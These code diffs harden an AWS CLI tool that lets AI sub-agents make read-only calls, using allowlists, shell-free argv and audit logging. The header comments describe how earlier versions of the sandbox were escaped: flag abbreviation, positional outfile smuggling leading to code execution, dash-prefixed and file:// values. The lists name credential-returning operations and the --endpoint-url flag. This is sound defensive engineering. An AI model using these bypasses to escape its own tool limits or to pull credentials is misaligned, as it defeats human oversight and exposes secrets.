+const DENIED_OPERATIONS = new Set([
+    'get-session-token', 'get-federation-token', 'get-login-password',
+    'get-token', 'get-password-data', 'get-cluster-credentials',
+    'get-instance-access-details', 'get-credential-report', 'get-authorization-token',
+]);
+
+/** Flags that would let a structured call reach outside its intent. */
+const DENIED_FLAGS = new Set([
+    '--endpoint-url', '--cli-input-json', '--cli-input-yaml', '--outfile',
+    '--debug', '--no-sign-request', '--ca-bundle', '--cli-binary-format',
+]);
+
+const IDENT = /^[a-z0-9][a-z0-9-]*$/;
+const REGION = /^[a-z0-9-]+$/;
+const PROFILE = /^[A-Za-z0-9_-]+$/;
+const FLAG = /^--[a-z0-9][a-z0-9-]*$/;
+
+export function validateAwsReadRequest(input: {
+    service: string; operation: string; region?: string; profile?: string;
+    params?: Record<string, string>;
+}): string | null {
+    if (!IDENT.test(input.service)) return `service "${input.service}" is not a valid AWS service name`;
+    if (!IDENT.test(input.operation)) return `operation "${input.operation}" is not a valid operation name`;
+    if (DENIED_OPERATIONS.has(input.operation)) {
+        return `operation "${input.operation}" returns credentials or mutates state and is not available to sub-agents`;
+    }
+    if (!READ_OPERATION_PREFIX.test(input.operation)) {
+        return `operation "${input.operation}" is not a read-only operation (must start with describe-, list-, get-, head-, search-, lookup-, check-, or batch-get-)`;
+    }
+    if (input.region !== undefined && !REGION.test(input.region)) return `invalid region "${input.region}"`;
+    if (input.profile !== undefined && !PROFILE.test(input.profile)) return `invalid profile "${input.profile}"`;
+
+    for (const [flag, value] of Object.entries(input.params ?? {})) {
+        if (!FLAG.test(flag)) return `parameter "${flag}" is not a valid --flag name`;
+        if (DENIED_FLAGS.has(flag)) return `parameter "${flag}" is not available to sub-agents`;
+        if (typeof value !== 'string') return `parameter "${flag}" must have a string value`;
+    }
+    return null;
+}
+
+/** Build argv. Exported so tests can assert the exact array without executing anything. */
+export function buildAwsReadArgv(input: {
+    service: string; operation: string; region?: string; profile?: string;
+    params?: Record<string, string>;
+}): string[] {
+    const argv = [input.service, input.operation];
+    if (input.region) argv.push('--region', input.region);
+    if (input.profile) argv.push('--profile', input.profile);
+    for (const [flag, value] of Object.entries(input.params ?? {})) argv.push(flag, value);
+    argv.push('--output', 'json');
+    return argv;
+}
+
+export function createAwsReadTool(tenantId: string) {
+    return tool(
+        async (input: {
+            service: string; operation: string; region?: string; profile?: string;
+            params?: Record<string, string>;
+        }): Promise<string> => {
+            const error = validateAwsReadRequest(input);
+            if (error) return `REFUSED: ${error}`;
+
+            const argv = buildAwsReadArgv(input);
+            try {
+                // shell: false is the entire safety argument — argv elements are passed
+                // to execve directly and are never tokenised or interpreted.
+                const { stdout, stderr } = await execFileAsync('aws', argv, {
+                    shell: false,
+                    timeout: AWS_READ_TIMEOUT_MS,
+                    maxBuffer: AWS_READ_MAX_BUFFER,
+                    env: buildCommandEnv(tenantId) as NodeJS.ProcessEnv,
+                });
+                const output = stdout || stderr || '(no output)';
+                return output.length > AWS_READ_OUTPUT_MAX_CHARS
+                    ? `${output.slice(0, AWS_READ_OUTPUT_MAX_CHARS)}\n…[truncated]`
+                    : output;
+            } catch (err) {
+                const e = err as { message?: string; stderr?: string };
+                return `ERROR: ${e.message ?? String(err)}\n${e.stderr ?? ''}`.trim();
+            }
+        },
+        {
+            name: 'aws_read',
+            description: `Run a READ-ONLY AWS CLI operation. This is your only route to AWS — you have no shell.
+
+Provide the service and operation separately; do not write a command line. Parameters are passed as a map of flag to value.
+
+Example: { "service": "ec2", "operation": "describe-instances", "region": "us-east-1", "profile": "nucleus_agent_123456789012_...", "params": { "--filters": "Name=instance-state-name,Values=running" } }
+
+Only read operations are permitted (describe-, list-, get-, head-, search-, lookup-, check-, batch-get-). Mutations are refused: report what should change in your findings and the main agent will carry it out under human approval.`,
+            schema: z.object({
+                service: z.string().describe('AWS service, e.g. "ec2", "rds", "cloudwatch"'),
+                operation: z.string().describe('Read-only operation, e.g. "describe-instances"'),
+                region: z.string().optional().describe('AWS region'),
+                profile: z.string().optional().describe('Profile name from get_aws_credentials'),
+                params: z.record(z.string(), z.string()).optional()
+                    .describe('CLI flags as a map, e.g. { "--instance-ids": "i-123" }'),
+            }),
+        },
+    );
+}

--- a/apps/web-ui/lib/agent/aws-read-tool.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.ts
@@ -73,21 +73,51 @@ export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
         'describe-network-interfaces', 'describe-route-tables', 'describe-nat-gateways',
         'describe-internet-gateways', 'describe-regions', 'describe-availability-zones',
         'describe-instance-types', 'describe-tags',
+        'describe-instance-status', 'describe-vpc-endpoints', 'describe-flow-logs',
+        // NOT describe-instance-attribute: --attribute userData returns the instance's
+        // user-data script, which routinely carries bootstrap credentials. Permanently out.
     ]),
-    rds: new Set(['describe-db-instances', 'describe-db-clusters', 'describe-db-snapshots']),
-    elbv2: new Set(['describe-load-balancers', 'describe-target-groups', 'describe-target-health']),
+    rds: new Set(['describe-db-instances', 'describe-db-clusters', 'describe-db-snapshots', 'describe-db-cluster-snapshots']),
+    elbv2: new Set([
+        'describe-load-balancers', 'describe-target-groups', 'describe-target-health',
+        'describe-listeners', 'describe-rules',
+    ]),
     autoscaling: new Set(['describe-auto-scaling-groups', 'describe-auto-scaling-instances']),
     ecs: new Set(['list-clusters', 'list-services', 'list-tasks', 'describe-clusters', 'describe-services', 'describe-tasks']),
     eks: new Set(['list-clusters', 'describe-cluster', 'list-nodegroups', 'describe-nodegroup']),
+    // NOTE: get-function-configuration returns Environment.Variables in plaintext,
+    // which routinely holds DB passwords and API keys. Kept because it is the only
+    // way to answer ordinary Lambda configuration questions — but sub-agent reports
+    // reach orchestrator context and, once Task 11 lands, Postgres. Revisit before
+    // transcript persistence ships.
     lambda: new Set(['list-functions', 'get-function-configuration']),
-    s3api: new Set(['list-buckets', 'get-bucket-location', 'get-bucket-tagging', 'get-bucket-encryption', 'get-bucket-versioning']),
-    cloudwatch: new Set(['get-metric-statistics', 'list-metrics', 'describe-alarms']),
-    logs: new Set(['describe-log-groups', 'describe-log-streams', 'filter-log-events']),
+    s3api: new Set([
+        'list-buckets', 'get-bucket-location', 'get-bucket-tagging', 'get-bucket-encryption',
+        'get-bucket-versioning', 'get-bucket-policy', 'get-bucket-acl', 'get-public-access-block',
+        'get-bucket-logging', 'list-objects-v2',
+        // NOT get-object: its outfile is a POSITIONAL, i.e. an arbitrary local file write.
+    ]),
+    cloudwatch: new Set(['get-metric-statistics', 'get-metric-data', 'list-metrics', 'describe-alarms']),
+    logs: new Set(['describe-log-groups', 'describe-log-streams', 'filter-log-events', 'get-log-events']),
     cloudformation: new Set(['list-stacks', 'describe-stacks', 'describe-stack-resources']),
-    iam: new Set(['list-roles', 'list-policies', 'get-role', 'get-policy', 'list-attached-role-policies']),
+    cloudtrail: new Set(['lookup-events']),
+    iam: new Set([
+        'list-roles', 'list-policies', 'get-role', 'get-policy', 'list-attached-role-policies',
+        'get-policy-version', 'list-role-policies', 'get-role-policy', 'list-users',
+        'list-attached-user-policies',
+        // NOT get-credential-report.
+    ]),
+    organizations: new Set(['list-accounts', 'describe-organization', 'list-accounts-for-parent', 'list-tags-for-resource']),
+    acm: new Set(['list-certificates', 'describe-certificate']),
+    kms: new Set(['list-keys', 'describe-key', 'list-aliases']),
+    route53: new Set(['list-hosted-zones', 'list-resource-record-sets']),
+    cloudfront: new Set(['list-distributions']),
     sts: new Set(['get-caller-identity']),
-    ce: new Set(['get-cost-and-usage']),
+    ce: new Set(['get-cost-and-usage', 'get-cost-forecast', 'get-dimension-values']),
     tag: new Set(['get-resources']),
+    // Deliberately absent: ssm (get-parameter returns SecureString plaintext),
+    // secretsmanager, sso, ecr, redshift, cognito-identity, and the `s3` command set
+    // (cp/sync/mv write files and mutate buckets — s3api is the read-only surface).
 };
 
 /**
@@ -100,45 +130,143 @@ export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
  * --profile, --region and --output are deliberately absent: the builder supplies
  * them from validated fields, and allowing them here would let a later duplicate
  * override the validated one (the AWS CLI takes the last occurrence).
+ *
+ * Every entry is a resource selector, a filter, or pagination — the parameters an
+ * allowlisted operation needs to be callable at all. An operation on ALLOWED_OPS
+ * whose required parameter is missing here is not actually available (e.g.
+ * `elbv2 describe-target-health` without --target-group-arn), which is the
+ * uselessness that pushes users back toward a shell. Nothing here changes WHERE the
+ * CLI connects, WHAT credentials it uses, or WHERE it writes.
  */
 export const ALLOWED_FLAGS: Record<string, 'none' | 'one' | 'many'> = {
+    // Filters, queries and pagination (cross-service)
     '--filters': 'many',
+    '--filter': 'many',
+    '--query': 'one',
+    '--max-items': 'one',
+    '--max-results': 'one',
+    '--max-keys': 'one',
+    '--limit': 'one',
+    '--starting-token': 'one',
+    '--continuation-token': 'one',
+    '--page-size': 'one',
+    '--no-paginate': 'none',
+    '--include-deleted': 'none',
+
+    // EC2
     '--instance-ids': 'many',
+    '--instance-types': 'many',
     '--volume-ids': 'many',
     '--snapshot-ids': 'many',
+    '--owner-ids': 'many',
+    '--owners': 'many',
+    '--image-ids': 'many',
     '--group-ids': 'many',
-    '--names': 'many',
-    '--auto-scaling-group-names': 'many',
+    '--group-names': 'many',
+    '--vpc-ids': 'many',
+    '--subnet-ids': 'many',
+    '--route-table-ids': 'many',
+    '--network-interface-ids': 'many',
+    '--nat-gateway-ids': 'many',
+    '--internet-gateway-ids': 'many',
+    '--vpc-endpoint-ids': 'many',
+    '--flow-log-ids': 'many',
+    '--allocation-ids': 'many',
+    '--public-ips': 'many',
+    '--region-names': 'many',
+    '--zone-names': 'many',
+    '--include-all-instances': 'none',
+
+    // RDS
     '--db-instance-identifier': 'one',
     '--db-cluster-identifier': 'one',
+    '--db-snapshot-identifier': 'one',
+    '--snapshot-type': 'one',
+
+    // ELBv2
+    '--load-balancer-arn': 'one',
+    '--load-balancer-arns': 'many',
+    '--target-group-arn': 'one',
+    '--target-group-arns': 'many',
+    '--listener-arn': 'one',
+    '--listener-arns': 'many',
+    '--rule-arns': 'many',
+
+    // Auto Scaling / ECS / EKS
+    '--auto-scaling-group-names': 'many',
     '--cluster': 'one',
+    '--clusters': 'many',
+    '--cluster-name': 'one',
+    '--nodegroup-name': 'one',
     '--service': 'one',
     '--services': 'many',
     '--tasks': 'many',
+    '--name': 'one',
+    '--names': 'many',
+
+    // Lambda
     '--function-name': 'one',
+    '--qualifier': 'one',
+
+    // S3 (s3api)
     '--bucket': 'one',
-    '--log-group-name': 'one',
-    '--log-stream-names': 'many',
-    '--stack-name': 'one',
-    '--role-name': 'one',
-    '--policy-arn': 'one',
+    '--prefix': 'one',
+    '--delimiter': 'one',
+
+    // CloudWatch
     '--metric-name': 'one',
+    '--metric': 'one',
     '--namespace': 'one',
     '--dimensions': 'many',
     '--statistics': 'many',
     '--period': 'one',
+    '--metric-data-queries': 'many',
+    '--scan-by': 'one',
+    '--alarm-names': 'many',
+    '--state-value': 'one',
+
+    // Logs / CloudTrail
+    '--log-group-name': 'one',
+    '--log-group-name-prefix': 'one',
+    '--log-stream-name': 'one',
+    '--log-stream-names': 'many',
+    '--filter-pattern': 'one',
+    '--start-from-head': 'none',
+    '--lookup-attributes': 'many',
+
+    // CloudFormation
+    '--stack-name': 'one',
+
+    // IAM
+    '--role-name': 'one',
+    '--user-name': 'one',
+    '--policy-arn': 'one',
+    '--policy-name': 'one',
+    '--version-id': 'one',
+    '--path-prefix': 'one',
+
+    // Organizations / ACM / KMS / Route 53
+    '--parent-id': 'one',
+    '--resource-id': 'one',
+    '--certificate-arn': 'one',
+    '--certificate-statuses': 'many',
+    '--key-id': 'one',
+    '--hosted-zone-id': 'one',
+    '--start-record-name': 'one',
+
+    // Time windows and Cost Explorer
     '--start-time': 'one',
     '--end-time': 'one',
     '--time-period': 'one',
     '--granularity': 'one',
     '--metrics': 'many',
+    '--group-by': 'many',
+    '--dimension': 'one',
+    '--search-string': 'one',
+
+    // Resource Groups Tagging
     '--resource-type-filters': 'many',
-    '--query': 'one',
-    '--max-items': 'one',
-    '--starting-token': 'one',
-    '--page-size': 'one',
-    '--no-paginate': 'none',
-    '--include-deleted': 'none',
+    '--tag-filters': 'many',
 };
 
 export type ParamValue = string | string[] | true;

--- a/apps/web-ui/lib/agent/aws-read-tool.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.ts
@@ -2,25 +2,45 @@
  * aws_read — the ONLY route from a sub-agent to AWS.
  *
  * Sub-agents have no shell (see subagent.ts's denylist). This tool takes a
- * structured request and builds argv itself, then runs `execFile` with
- * shell: false. Nothing the model supplies is ever interpreted by a shell, so the
- * escape classes that broke two previous designs — metacharacters, quoting,
- * flag-order confusion, LD_PRELOAD prefixes, command substitution — are not
- * merely blocked here, they are unrepresentable.
+ * structured request, builds argv itself, and runs execFile with shell: false, so
+ * metacharacters, quoting, command substitution and LD_PRELOAD-style env prefixes
+ * are unrepresentable rather than blocked.
  *
- * Three further restrictions close what a structured call could still reach:
- *  - no positional arguments, so `s3api get-object … OUTFILE` cannot write a file;
- *  - a denied-flag set, so --endpoint-url cannot exfiltrate and --cli-input-json
- *    cannot smuggle parameters past validation;
- *  - a denied-operation set, so credential-minting reads (sts get-session-token,
- *    ecr get-login-password) and mutating "get-" operations
- *    (redshift get-cluster-credentials --auto-create) are refused by name.
+ * ALLOWLISTS ONLY. An earlier revision used denylists and was escaped twice:
+ *  - argparse has allow_abbrev=True, so every denied flag had an accepted
+ *    abbreviation (--endpoint for --endpoint-url). A denylist over an abbreviating
+ *    parser is structurally unsound.
+ *  - a zero-arity flag ("--no-cli-pager": "/tmp/x") emitted `flag value`, and the
+ *    CLI read the value as a POSITIONAL — which for `s3api get-object` is the
+ *    outfile. That wrote an arbitrary local file, and a credential_process entry in
+ *    ~/.aws/config turned it into arbitrary code execution.
+ *
+ * Hence every flag declares its ARITY. A zero-arity flag never emits a value token,
+ * so no positional can be produced by construction — not by policy.
+ *
+ * THE ARGV INVARIANT. Arity alone is not sufficient, because the allowlist
+ * constrains the KEYS of `params` while the model controls the VALUES, and argparse
+ * decides what is a flag by looking at the token. A 'many' flag emits each array
+ * element as its own token, so `{"--instance-ids": ["i-1", "--endpoint-url", "…"]}`
+ * would have argparse stop consuming at "--endpoint-url" and parse it as a flag —
+ * defeating the flag allowlist through the one axis it does not cover. The
+ * invariant that closes it, enforced below on every value including region and
+ * profile:
+ *
+ *     No argv token may begin with "-" unless the builder emitted it as a flag.
+ *
+ * No legitimate AWS value starts with "-" (ids, ARNs, JMESPath expressions,
+ * Name=…,Values=… filters, ISO timestamps, epoch seconds), so this costs nothing
+ * and makes "the model cannot introduce a flag" structural in the same way arity
+ * makes "the model cannot introduce a positional" structural.
  */
 import { execFile } from 'child_process';
 import { promisify } from 'util';
 import { tool } from '@langchain/core/tools';
 import { z } from 'zod';
 import { buildCommandEnv } from './tools';
+import { Semaphore } from './concurrency';
+import { AuditService } from '@/lib/audit-service';
 
 const execFileAsync = promisify(execFile);
 
@@ -28,86 +48,236 @@ const AWS_READ_TIMEOUT_MS = 120_000;
 const AWS_READ_MAX_BUFFER = 10 * 1024 * 1024;
 export const AWS_READ_OUTPUT_MAX_CHARS = 100_000;
 
-/** Read-only operation prefixes, by AWS CLI convention. */
-const READ_OPERATION_PREFIX = /^(describe|list|get|head|search|lookup|check|batch-get)-/;
+/**
+ * Bounds concurrent `aws` subprocesses. execute_command already has this bound
+ * (TOOL_CONCURRENCY) precisely because subprocesses need one; N sub-agents each
+ * issuing a parallel turn would otherwise fan out unbounded ~100MB processes in
+ * the ECS task.
+ */
+const AWS_READ_CONCURRENCY = Number(process.env.TOOL_CONCURRENCY) || 6;
+const awsReadSemaphore = new Semaphore(AWS_READ_CONCURRENCY);
 
-/** Operations that match the read prefix but mint credentials or mutate. */
-const DENIED_OPERATIONS = new Set([
-    'get-session-token', 'get-federation-token', 'get-login-password',
-    'get-token', 'get-password-data', 'get-cluster-credentials',
-    'get-instance-access-details', 'get-credential-report', 'get-authorization-token',
-]);
+/**
+ * Permitted (service, operation) pairs. Explicit, not prefix-matched: a `get-`
+ * prefix proves nothing — `redshift get-cluster-credentials` mutates, and
+ * `sts get-session-token`, `sso get-role-credentials`, `ecr get-login-password`
+ * and `secretsmanager get-secret-value` all return usable credentials.
+ *
+ * Add entries as the audit use case needs them. A refusal here is a feature
+ * request, never a security incident.
+ */
+export const ALLOWED_OPS: Record<string, ReadonlySet<string>> = {
+    ec2: new Set([
+        'describe-instances', 'describe-volumes', 'describe-snapshots', 'describe-images',
+        'describe-security-groups', 'describe-vpcs', 'describe-subnets', 'describe-addresses',
+        'describe-network-interfaces', 'describe-route-tables', 'describe-nat-gateways',
+        'describe-internet-gateways', 'describe-regions', 'describe-availability-zones',
+        'describe-instance-types', 'describe-tags',
+    ]),
+    rds: new Set(['describe-db-instances', 'describe-db-clusters', 'describe-db-snapshots']),
+    elbv2: new Set(['describe-load-balancers', 'describe-target-groups', 'describe-target-health']),
+    autoscaling: new Set(['describe-auto-scaling-groups', 'describe-auto-scaling-instances']),
+    ecs: new Set(['list-clusters', 'list-services', 'list-tasks', 'describe-clusters', 'describe-services', 'describe-tasks']),
+    eks: new Set(['list-clusters', 'describe-cluster', 'list-nodegroups', 'describe-nodegroup']),
+    lambda: new Set(['list-functions', 'get-function-configuration']),
+    s3api: new Set(['list-buckets', 'get-bucket-location', 'get-bucket-tagging', 'get-bucket-encryption', 'get-bucket-versioning']),
+    cloudwatch: new Set(['get-metric-statistics', 'list-metrics', 'describe-alarms']),
+    logs: new Set(['describe-log-groups', 'describe-log-streams', 'filter-log-events']),
+    cloudformation: new Set(['list-stacks', 'describe-stacks', 'describe-stack-resources']),
+    iam: new Set(['list-roles', 'list-policies', 'get-role', 'get-policy', 'list-attached-role-policies']),
+    sts: new Set(['get-caller-identity']),
+    ce: new Set(['get-cost-and-usage']),
+    tag: new Set(['get-resources']),
+};
 
-/** Flags that would let a structured call reach outside its intent. */
-const DENIED_FLAGS = new Set([
-    '--endpoint-url', '--cli-input-json', '--cli-input-yaml', '--outfile',
-    '--debug', '--no-sign-request', '--ca-bundle', '--cli-binary-format',
-]);
+/**
+ * Permitted flags and how many values each consumes.
+ *  - 'none' — a boolean flag. Value MUST be `true`; the flag is emitted alone, so
+ *    no value token exists to be mistaken for a positional.
+ *  - 'one'  — exactly one value.
+ *  - 'many' — one or more values (e.g. --instance-ids i-1 i-2).
+ *
+ * --profile, --region and --output are deliberately absent: the builder supplies
+ * them from validated fields, and allowing them here would let a later duplicate
+ * override the validated one (the AWS CLI takes the last occurrence).
+ */
+export const ALLOWED_FLAGS: Record<string, 'none' | 'one' | 'many'> = {
+    '--filters': 'many',
+    '--instance-ids': 'many',
+    '--volume-ids': 'many',
+    '--snapshot-ids': 'many',
+    '--group-ids': 'many',
+    '--names': 'many',
+    '--auto-scaling-group-names': 'many',
+    '--db-instance-identifier': 'one',
+    '--db-cluster-identifier': 'one',
+    '--cluster': 'one',
+    '--service': 'one',
+    '--services': 'many',
+    '--tasks': 'many',
+    '--function-name': 'one',
+    '--bucket': 'one',
+    '--log-group-name': 'one',
+    '--log-stream-names': 'many',
+    '--stack-name': 'one',
+    '--role-name': 'one',
+    '--policy-arn': 'one',
+    '--metric-name': 'one',
+    '--namespace': 'one',
+    '--dimensions': 'many',
+    '--statistics': 'many',
+    '--period': 'one',
+    '--start-time': 'one',
+    '--end-time': 'one',
+    '--time-period': 'one',
+    '--granularity': 'one',
+    '--metrics': 'many',
+    '--resource-type-filters': 'many',
+    '--query': 'one',
+    '--max-items': 'one',
+    '--starting-token': 'one',
+    '--page-size': 'one',
+    '--no-paginate': 'none',
+    '--include-deleted': 'none',
+};
 
-const IDENT = /^[a-z0-9][a-z0-9-]*$/;
-const REGION = /^[a-z0-9-]+$/;
-const PROFILE = /^[A-Za-z0-9_-]+$/;
-const FLAG = /^--[a-z0-9][a-z0-9-]*$/;
+export type ParamValue = string | string[] | true;
 
-export function validateAwsReadRequest(input: {
-    service: string; operation: string; region?: string; profile?: string;
-    params?: Record<string, string>;
-}): string | null {
-    if (!IDENT.test(input.service)) return `service "${input.service}" is not a valid AWS service name`;
-    if (!IDENT.test(input.operation)) return `operation "${input.operation}" is not a valid operation name`;
-    if (DENIED_OPERATIONS.has(input.operation)) {
-        return `operation "${input.operation}" returns credentials or mutates state and is not available to sub-agents`;
+const SERVICE = /^[a-z0-9][a-z0-9-]*$/;
+/**
+ * Anchored to a leading letter, not merely to the lowercase-and-hyphen character
+ * class: `^[a-z0-9-]+$` matches the literal string "--endpoint-url", which would
+ * put an option-looking token in argv and leave safety resting on argparse's error
+ * handling. Same reasoning for PROFILE's leading character class.
+ */
+const REGION = /^[a-z][a-z0-9]*(-[a-z0-9]+)+$/;
+const PROFILE = /^[A-Za-z0-9][A-Za-z0-9_-]*$/;
+
+/**
+ * Own-property lookup. Both maps are plain objects, so a bare index would resolve
+ * inherited keys: `ALLOWED_OPS['constructor']` returns the Object constructor
+ * (truthy, and `.has` is undefined — a TypeError thrown out of a function whose
+ * contract is to return a refusal string), and `ALLOWED_FLAGS['constructor']`
+ * likewise reads as a defined arity.
+ */
+function own<T>(map: Record<string, T>, key: string): T | undefined {
+    return Object.prototype.hasOwnProperty.call(map, key) ? map[key] : undefined;
+}
+
+export interface AwsReadRequest {
+    service: string;
+    operation: string;
+    region?: string;
+    profile?: string;
+    params?: Record<string, ParamValue>;
+}
+
+/** Returns an error string for a refusal, or null when the request is permitted. */
+export function validateAwsReadRequest(input: AwsReadRequest): string | null {
+    if (typeof input?.service !== 'string' || !SERVICE.test(input.service)) {
+        return `service "${input?.service}" is not a permitted AWS service`;
     }
-    if (!READ_OPERATION_PREFIX.test(input.operation)) {
-        return `operation "${input.operation}" is not a read-only operation (must start with describe-, list-, get-, head-, search-, lookup-, check-, or batch-get-)`;
+    const operations = own(ALLOWED_OPS, input.service);
+    if (!operations) {
+        return `service "${input.service}" is not available to sub-agents (permitted: ${Object.keys(ALLOWED_OPS).join(', ')})`;
     }
-    if (input.region !== undefined && !REGION.test(input.region)) return `invalid region "${input.region}"`;
-    if (input.profile !== undefined && !PROFILE.test(input.profile)) return `invalid profile "${input.profile}"`;
+    if (typeof input.operation !== 'string' || !operations.has(input.operation)) {
+        return `operation "${input.operation}" is not a permitted read-only operation for ${input.service}`;
+    }
+    if (input.region !== undefined && (typeof input.region !== 'string' || !REGION.test(input.region))) {
+        return `invalid region "${input.region}"`;
+    }
+    if (input.profile !== undefined && (typeof input.profile !== 'string' || !PROFILE.test(input.profile))) {
+        return `invalid profile "${input.profile}"`;
+    }
 
     for (const [flag, value] of Object.entries(input.params ?? {})) {
-        if (!FLAG.test(flag)) return `parameter "${flag}" is not a valid --flag name`;
-        if (DENIED_FLAGS.has(flag)) return `parameter "${flag}" is not available to sub-agents`;
-        if (typeof value !== 'string') return `parameter "${flag}" must have a string value`;
+        const arity = own(ALLOWED_FLAGS, flag);
+        if (!arity) return `parameter "${flag}" is not a permitted flag`;
+
+        if (arity === 'none') {
+            // A value here is exactly the positional-smuggling vector.
+            if (value !== true) return `parameter "${flag}" takes no value — pass true`;
+            continue;
+        }
+        const values = Array.isArray(value) ? value : [value];
+        if (values.length === 0) return `parameter "${flag}" requires a value`;
+        if (arity === 'one' && values.length !== 1) return `parameter "${flag}" takes exactly one value`;
+        for (const v of values) {
+            if (typeof v !== 'string' || v.length === 0) return `parameter "${flag}" values must be non-empty strings`;
+            // The argv invariant. A 'many' flag emits each element as its own
+            // token, so a value beginning with "-" would be parsed by the CLI as a
+            // FLAG — which is how the flag allowlist gets bypassed through the one
+            // axis it does not constrain.
+            if (v.startsWith('-')) {
+                return `parameter "${flag}" values must not begin with "-" (a value starting with a dash would be parsed as a flag)`;
+            }
+        }
     }
     return null;
 }
 
-/** Build argv. Exported so tests can assert the exact array without executing anything. */
-export function buildAwsReadArgv(input: {
-    service: string; operation: string; region?: string; profile?: string;
-    params?: Record<string, string>;
-}): string[] {
+/**
+ * Build argv. Exported so tests can assert the exact array without executing.
+ * Every emitted token is either a flag or a value belonging to a flag of declared
+ * non-zero arity — so a positional argument cannot be produced.
+ */
+export function buildAwsReadArgv(input: AwsReadRequest): string[] {
     const argv = [input.service, input.operation];
     if (input.region) argv.push('--region', input.region);
     if (input.profile) argv.push('--profile', input.profile);
-    for (const [flag, value] of Object.entries(input.params ?? {})) argv.push(flag, value);
+    for (const [flag, value] of Object.entries(input.params ?? {})) {
+        // own(): the builder is exported and independently callable, and "cannot
+        // emit a positional" must hold on its own rather than by trusting its
+        // caller to have validated first.
+        if (own(ALLOWED_FLAGS, flag) === 'none') { argv.push(flag); continue; }
+        argv.push(flag, ...(Array.isArray(value) ? value : [value as string]));
+    }
     argv.push('--output', 'json');
     return argv;
 }
 
-export function createAwsReadTool(tenantId: string) {
+export function createAwsReadTool(tenantId: string, userId?: string) {
     return tool(
-        async (input: {
-            service: string; operation: string; region?: string; profile?: string;
-            params?: Record<string, string>;
-        }): Promise<string> => {
+        async (input: AwsReadRequest): Promise<string> => {
             const error = validateAwsReadRequest(input);
             if (error) return `REFUSED: ${error}`;
 
             const argv = buildAwsReadArgv(input);
+
+            // Sub-agent AWS activity has no human gate, so it must be auditable.
+            // Fire-and-forget: an audit failure must never block the read.
+            AuditService.logResourceAction({
+                eventType: 'agent.subagent.aws_read',
+                action: 'aws_read',
+                resourceType: 'agent_tool',
+                resourceId: 'aws_read',
+                resourceName: 'Sub-agent AWS read',
+                status: 'success',
+                details: `aws ${argv.join(' ')}`.slice(0, 2000),
+                user: userId || 'subagent',
+                userType: userId ? 'user' : 'system',
+                source: 'agent',
+                severity: 'low',
+                tenantId,
+                metadata: { tenantId, service: input.service, operation: input.operation },
+            }).catch(() => {});
+
             try {
-                // shell: false is the entire safety argument — argv elements are passed
-                // to execve directly and are never tokenised or interpreted.
-                const { stdout, stderr } = await execFileAsync('aws', argv, {
-                    shell: false,
-                    timeout: AWS_READ_TIMEOUT_MS,
-                    maxBuffer: AWS_READ_MAX_BUFFER,
-                    env: buildCommandEnv(tenantId) as NodeJS.ProcessEnv,
+                return await awsReadSemaphore.run(async () => {
+                    // shell: false is the safety argument — argv elements go to execve
+                    // directly and are never tokenised or interpreted.
+                    const { stdout, stderr } = await execFileAsync('aws', argv, {
+                        shell: false,
+                        timeout: AWS_READ_TIMEOUT_MS,
+                        maxBuffer: AWS_READ_MAX_BUFFER,
+                        env: buildCommandEnv(tenantId) as NodeJS.ProcessEnv,
+                    });
+                    const output = stdout || stderr || '(no output)';
+                    return output.length > AWS_READ_OUTPUT_MAX_CHARS
+                        ? `${output.slice(0, AWS_READ_OUTPUT_MAX_CHARS)}\n…[truncated]`
+                        : output;
                 });
-                const output = stdout || stderr || '(no output)';
-                return output.length > AWS_READ_OUTPUT_MAX_CHARS
-                    ? `${output.slice(0, AWS_READ_OUTPUT_MAX_CHARS)}\n…[truncated]`
-                    : output;
             } catch (err) {
                 const e = err as { message?: string; stderr?: string };
                 return `ERROR: ${e.message ?? String(err)}\n${e.stderr ?? ''}`.trim();
@@ -115,20 +285,22 @@ export function createAwsReadTool(tenantId: string) {
         },
         {
             name: 'aws_read',
-            description: `Run a READ-ONLY AWS CLI operation. This is your only route to AWS — you have no shell.
+            description: `Run a permitted READ-ONLY AWS CLI operation. This is your only route to AWS — you have no shell.
 
-Provide the service and operation separately; do not write a command line. Parameters are passed as a map of flag to value.
+Give the service and operation separately; never write a command line. Parameters are a map of flag to value, where a value is a string, an array of strings for multi-value flags, or true for flags that take no value. A value may not begin with "-".
 
-Example: { "service": "ec2", "operation": "describe-instances", "region": "us-east-1", "profile": "nucleus_agent_123456789012_...", "params": { "--filters": "Name=instance-state-name,Values=running" } }
+Example:
+{ "service": "ec2", "operation": "describe-instances", "region": "us-east-1", "profile": "nucleus_agent_...", "params": { "--instance-ids": ["i-1", "i-2"], "--no-paginate": true } }
 
-Only read operations are permitted (describe-, list-, get-, head-, search-, lookup-, check-, batch-get-). Mutations are refused: report what should change in your findings and the main agent will carry it out under human approval.`,
+Only an explicit allowlist of services and operations is permitted. If you need one that is refused, say so in your findings rather than trying to work around it — mutations and credential-returning operations are deliberately unavailable, and the main agent will carry out any change under human approval.`,
             schema: z.object({
                 service: z.string().describe('AWS service, e.g. "ec2", "rds", "cloudwatch"'),
                 operation: z.string().describe('Read-only operation, e.g. "describe-instances"'),
                 region: z.string().optional().describe('AWS region'),
                 profile: z.string().optional().describe('Profile name from get_aws_credentials'),
-                params: z.record(z.string(), z.string()).optional()
-                    .describe('CLI flags as a map, e.g. { "--instance-ids": "i-123" }'),
+                params: z.record(z.string(), z.union([z.string(), z.array(z.string()), z.literal(true)]))
+                    .optional()
+                    .describe('Flags: string, string[] for multi-value, or true for valueless flags'),
             }),
         },
     );

--- a/apps/web-ui/lib/agent/aws-read-tool.ts
+++ b/apps/web-ui/lib/agent/aws-read-tool.ts
@@ -33,6 +33,13 @@
  * Name=…,Values=… filters, ISO timestamps, epoch seconds), so this costs nothing
  * and makes "the model cannot introduce a flag" structural in the same way arity
  * makes "the model cannot introduce a positional" structural.
+ *
+ * THE VALUE AXIS. That invariant is still a denylist ("must not start with -"), and
+ * it was escaped by a value that starts with a letter: `file://…`, which the CLI
+ * dereferences and echoes back on a parse error. Values are therefore validated
+ * POSITIVELY — every flag declares the SHAPE its values must match — with the
+ * dash rule and an explicit URI-scheme rule kept as cheap backstops. See
+ * ValueShape below for why no shape can match a scheme.
  */
 import { execFile } from 'child_process';
 import { promisify } from 'util';
@@ -40,7 +47,12 @@ import { tool } from '@langchain/core/tools';
 import { z } from 'zod';
 import { buildCommandEnv } from './tools';
 import { Semaphore } from './concurrency';
+import { markSubagentReadOnlyTool } from './subagent-tool-marker';
